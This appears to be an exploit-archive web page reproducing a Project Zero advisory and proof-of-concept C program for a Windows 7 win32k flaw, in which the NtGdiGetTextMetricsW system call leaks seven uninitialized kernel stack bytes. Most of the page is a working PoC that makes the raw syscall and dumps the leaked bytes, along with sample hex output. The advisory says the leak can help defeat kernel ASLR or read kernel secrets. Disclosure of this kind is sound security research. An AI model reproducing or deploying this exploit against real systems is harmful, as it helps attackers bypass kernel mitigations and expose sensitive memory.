扫码分享
验证:
体验盒子|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 |
/* Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1180 We have discovered that it is possible to disclose portions of uninitialized kernel stack memory to user-mode applications in Windows 7 (other systems untested) through the win32k!NtGdiGetTextMetricsW system call. The output structure used by the syscall, according to various sources, is TMW_INTERNAL, which wraps the TEXTMETRICW and TMDIFF structures (see e.g. the PoC forissue #480 ). The disclosure occurs when the service is called against a Device Context with one of the stock fonts selected (we're using DEVICE_DEFAULT_FONT). Then, we can find 7 uninitialized kernel stack bytes at offsets 0x39-0x3f of the output buffer. An example output of the attached proof-of-concept program started on Windows 7 32-bit is as follows: --- cut --- 00000000: 10 00 00 00 0d 00 00 00 03 00 00 00 03 00 00 00 ................ 00000010: 00 00 00 00 07 00 00 00 0f 00 00 00 bc 02 00 00 ................ 00000020: 00 00 00 00 60 00 00 00 60 00 00 00 20 00 22 21 ....<code>...</code>... ."! 00000030: ac 20 20 00 00 00 00 21 ee[03 81 ff 35 64 36 8f].....!....5d6. 00000040: 20 ff 80 20 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ??.. ............ --- cut --- Here, the leaked bytes are "03 81 ff 35 64 36 8f". If we map the 0x39-0x3f offsets to the layout of the TMW_INTERNAL structure, it turns out that the 7 bytes in question correspond to the 3 alignments bytes past the end of TEXTMETRICSW (which itself has an odd length of 57 bytes), and the first 4 bytes of the TMDIFF structure. Triggering the vulnerability could allow local authenticated attackers to defeat certain exploit mitigations (kernel ASLR) or read other secrets stored in the kernel address space. */ #include <Windows.h> #include <cstdio> // For native 32-bit execution. extern "C" ULONG CDECL SystemCall32(DWORD ApiNumber, ...) { __asm{mov eax, ApiNumber}; __asm{lea edx, ApiNumber + 4}; __asm{int 0x2e}; } VOID PrintHex(PBYTE Data, ULONG dwBytes) { for (ULONG i = 0; i < dwBytes; i += 16) { printf("%.8x: ", i); for (ULONG j = 0; j < 16; j++) { if (i + j < dwBytes) { printf("%.2x ", Data[i + j]); } else { printf("?? "); } } for (ULONG j = 0; j < 16; j++) { if (i + j < dwBytes && Data[i + j] >= 0x20 && Data[i + j] <= 0x7e) { printf("%c", Data[i + j]); } else { printf("."); } } printf("\n"); } } int main() { // Windows 7 32-bit. CONST ULONG __NR_NtGdiGetTextMetricsW = 0x10d9; // Create a Device Context. HDC hdc = CreateCompatibleDC(NULL); // Get a handle to the stock font. HFONT hfont = (HFONT)GetStockObject(DEVICE_DEFAULT_FONT); if (hfont == NULL) { printf("GetCurrentObject failed\n"); return 1; } // Select the font into the DC. SelectObject(hdc, hfont); // Trigger the vulnerability and dump the kernel output on stdout. BYTE output[0x44] = { /* zero padding */ }; if (!SystemCall32(__NR_NtGdiGetTextMetricsW, hdc, output, sizeof(output))) { printf("NtGdiGetTextMetricsW failed\n"); DeleteObject(hfont); DeleteDC(hdc); return 1; } PrintHex(output, sizeof(output)); // Free resources. DeleteObject(hfont); DeleteDC(hdc); return 0; } |
体验盒子
